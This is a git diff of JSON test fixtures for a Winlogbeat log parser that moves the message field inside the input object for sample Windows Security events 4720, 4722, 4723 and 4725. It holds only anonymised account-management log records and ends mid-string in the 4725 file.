+    "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}",
     "sekoiaio": {
       "intake": {
         "dialect": "Elastic Winlogbeat",
         "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b"
       }
-    },
-    "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}"
+    }
   },
   "expected": {
     "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}",
diff --git a/Beats/winlogbeat/tests/security_event_4722.json b/Beats/winlogbeat/tests/security_event_4722.json
index 94bd16fdf..99debf8cf 100644
--- a/Beats/winlogbeat/tests/security_event_4722.json
+++ b/Beats/winlogbeat/tests/security_event_4722.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}",
     "sekoiaio": {
       "intake": {
         "dialect": "Elastic Winlogbeat",
         "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b"
       }
-    },
-    "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}"
+    }
   },
   "expected": {
     "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}",
diff --git a/Beats/winlogbeat/tests/security_event_4723.json b/Beats/winlogbeat/tests/security_event_4723.json
index 34874fdfb..ac581308e 100644
--- a/Beats/winlogbeat/tests/security_event_4723.json
+++ b/Beats/winlogbeat/tests/security_event_4723.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}",
     "sekoiaio": {
       "intake": {
         "dialect": "Elastic Winlogbeat",
         "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b"
       }
-    },
-    "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}"
+    }
   },
   "expected": {
     "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}",
diff --git a/Beats/winlogbeat/tests/security_event_4725.json b/Beats/winlogbeat/tests/security_event_4725.json
index 31cca5f97..d3826be97 100644
--- a/Beats/winlogbeat/tests/security_event_4725.json
+++ b/Beats/winlogbeat/tests/security_event_4725.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount 